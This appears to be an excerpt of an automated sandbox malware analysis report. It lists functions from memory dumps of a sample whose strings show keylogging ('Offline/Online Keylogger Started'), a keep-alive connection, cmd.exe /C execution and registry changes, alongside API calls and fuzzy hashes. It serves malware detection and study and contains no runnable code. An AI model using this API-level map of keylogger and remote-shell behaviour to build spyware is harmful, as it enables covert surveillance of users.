Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99

Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Strings

Offline Keylogger Started, xrefs: 004098C7, 004098CE, 004098FB

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 261355a37b2f82b7dd8b5725b485e9776245c03b355055529dcf8ee4d61b6617
Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
Opcode Fuzzy Hash: 261355a37b2f82b7dd8b5725b485e9776245c03b355055529dcf8ee4d61b6617
Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB

Function 0247AADD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0247AAEB
wsprintfW.USER32 ref: 0247AB6C

Part of subcall function 02479FBF: SetEvent.KERNEL32(00000000,?,00000000,0247AB83,00000000), ref: 02479FEB

Strings

Offline Keylogger Started, xrefs: 0247AAE4
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0247AAF4

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started
API String ID: 1497725170-184404310
Opcode ID: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
Instruction ID: 67e6e9620e46b8117b10903d0bf4079d51e267be5b97409e8ed7c62937db3267
Opcode Fuzzy Hash: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
Instruction Fuzzy Hash: 9F116672404118AACB18FB56EC50CFE77BEEE54351B00012FF91266194EF785A85CAB5

Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9

Strings

Online Keylogger Started, xrefs: 0040A626, 0040A62F, 0040A659

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 062d9a65db34ab421a9922c061003e946467fd8d9e0df7f3af24899ac9714eeb
Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
Opcode Fuzzy Hash: 062d9a65db34ab421a9922c061003e946467fd8d9e0df7f3af24899ac9714eeb
Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB

Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
__dosmaperr.LIBCMT ref: 0044AAFE

Strings

`@, xrefs: 0044AA78

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: `@
API String ID: 2583163307-951712118
Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F

Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00404946
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040495C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: b528d2073a9750103dc0c75b99cca2e42a21b43076f4e2bb952050e6725ed3c1
Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
Opcode Fuzzy Hash: b528d2073a9750103dc0c75b99cca2e42a21b43076f4e2bb952050e6725ed3c1
Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA

Function 02474B7C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 02474BAD
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02474BFB
CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 02474C0E

Strings

KeepAlive | Enabled | Timeout: , xrefs: 02474BC3

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
Instruction ID: 62bdd207d81af630416caa088481f5b97e573cecb162ed2539a723427410f22a
Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
Instruction Fuzzy Hash: BE11E3619042647BC711BB7A8808BEB7FA8AB46354F00406BE41552251DBB49485CBF2

Function 0248A6CA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0248B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0248A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0248B3D3
Part of subcall function 0248B3C2: IsWow64Process.KERNEL32(00000000,?,?,0248A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0248B3DA

Part of subcall function 0248277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0248279E
Part of subcall function 0248277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 024827BB
Part of subcall function 0248277A: RegCloseKey.ADVAPI32(?), ref: 024827C6

StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0248A740

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0248A6DE, 0248A6E8, 0248A726
(32 bit), xrefs: 0248A768
(64 bit), xrefs: 0248A76D, 0248A777

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64
String ID: (32 bit)$ (64 bit)$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 782494840-214125106
Opcode ID: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
Instruction ID: 535ebd8bc3544b87244ba544f2094b042b52520df8c72f77e2b5f0d3790e96ce
Opcode Fuzzy Hash: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
Instruction Fuzzy Hash: 04114C60A002462AD705F376DC9AEAF366BDB80300F50443FA921E32D1FF948E468BE5

Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7

Strings

Connection Timeout, xrefs: 00404B66

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 03ccfdf37a6186ff5affc7a02b39037453197ec822968bf477642e56721ed674
Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
Opcode Fuzzy Hash: 03ccfdf37a6186ff5affc7a02b39037453197ec822968bf477642e56721ed674
Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A

Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08

Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800

__CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C

Strings

bad locale name, xrefs: 0040CE16

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C

Function 004126D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714

Strings

Control Panel\Desktop, xrefs: 004126DB, 004126EB

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Control Panel\Desktop
API String ID: 1818849710-27424756
Opcode ID: 7c7e510ab521e1e48fb3f4cb6150f77cbefc72814b957e6e42432158584d30e3
Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
Opcode Fuzzy Hash: 7c7e510ab521e1e48fb3f4cb6150f77cbefc72814b957e6e42432158584d30e3
Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

Function 02482939 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 02482948
RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0248BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 02482970
RegCloseKey.ADVAPI32(004655B0,?,?,0248BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,02477C44,00000001), ref: 0248297B

Strings

Control Panel\Desktop, xrefs: 02482942, 02482952

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Control Panel\Desktop
API String ID: 1818849710-27424756
Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
Instruction ID: d7875b766a5d48bf1f05c5d1b9597ce216867619619c018ea4e3ece867349e08
Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
Instruction Fuzzy Hash: 25F09072540108BBDB01AFA1EC14EEF376DEF00750F108129BE16A6161EB71DE04EE60

Function 02471FF8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02471FFD

Strings

T=G, xrefs: 0247201E
wkE, xrefs: 02471FF8
T=G, xrefs: 02472042

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: T=G$T=G$wkE
API String ID: 3519838083-2195589345
Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
Instruction ID: c785076827efa63893145c6a6d3a303853543712c868a125f5a7740d2750cd1f
Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
Instruction Fuzzy Hash: 01F0E071B001506BC714EB6588006DE7676DB51314F10C16F9C3577250CBF98D05CF65

Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

Strings

TUF, xrefs: 004127D9, 004127FB, 004127DC

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: TUF
API String ID: 1818849710-3431404234
Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

Function 02482A3C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 02482A4A
RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0247BBB3,004660E0,00000001,000000AF,00465554), ref: 02482A65
RegCloseKey.ADVAPI32(?,?,?,?,0247BBB3,004660E0,00000001,000000AF,00465554), ref: 02482A70

Strings

TUF, xrefs: 02482A40, 02482A62, 02482A43

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: TUF
API String ID: 1818849710-3431404234
Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction ID: 08957856bc3f89d52f1d85b7bb1cc45b229cbce7a39d0d35e8938c309b646adb
Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
Instruction Fuzzy Hash: 6BE03071540208BFEF219BA09C05FDF3BA8EB04B95F004061FA05E6191D371CE04D794

Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4

Strings

cmd.exe, xrefs: 004151E9
/C , xrefs: 004151D2
open, xrefs: 004151EE

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: b0179d61eaee3bd5a9ea2a0a68336401775459cbfdb154dbe1958acde1283670
Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
Opcode Fuzzy Hash: b0179d61eaee3bd5a9ea2a0a68336401775459cbfdb154dbe1958acde1283670
Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E

Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
GetProcAddress.KERNEL32(00000000), ref: 00401441

Strings

GetCursorInfo, xrefs: 00401430
User32.dll, xrefs: 00401435

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E

Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
GetProcAddress.KERNEL32(00000000), ref: 004014E6

Strings

GetLastInputInfo, xrefs: 004014D5
User32.dll, xrefs: 004014DA

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F

Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00448D96
__alldvrm.LIBCMT ref: 00448F97
__alldvrm.LIBCMT ref: 00448FB9

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: eba9332f8d77f1450ce7a8502fdd5767474f452c5ab38b873a50abd430a7adb5
Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
Opcode Fuzzy Hash: eba9332f8d77f1450ce7a8502fdd5767474f452c5ab38b873a50abd430a7adb5
Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759

Function 024B8F72 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 024B8FFD
__alldvrm.LIBCMT ref: 024B91FE
__alldvrm.LIBCMT ref: 024B9220

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
Instruction ID: 9f3b3be49a1881f1e16e61e85d3f2241a648e57ae244f216f4d18d65f9bf17a6
Opcode Fuzzy Hash: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
Instruction Fuzzy Hash: 70A13671D002869FEB27CF68C8907EABBA5EF55350F14456FD6959B381C3388941CF60

Function 0248BA8B Relevance: 6.2, APIs: 4, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,0046BD30,00000000,00020019,?), ref: 0248BAAD
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0248BAF1

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: EnumOpen
String ID:
API String ID: 3231578192-0
Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
Instruction ID: 2dc3dc5820e69d725059c5f9e71de4d60a15a7e9d3ccc63e16c000268dcb9b2b
Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
Instruction Fuzzy Hash: 998112311182859BC764EF21D850FEFB7E9EF94300F10492FE99682194EF70AA49CF96

Function 024C5C31 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024C5D60

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
Instruction ID: 9f3a8c7fdf6a5edf39699c6358bb48ef54dcaa2ae38e7b421cc1bbdc0ead73fa
Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
Instruction Fuzzy Hash: 7F413A356007006BDB666F7ECC88AEF3A66EF01330FA4465FF418A6390DB7498428A71

Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
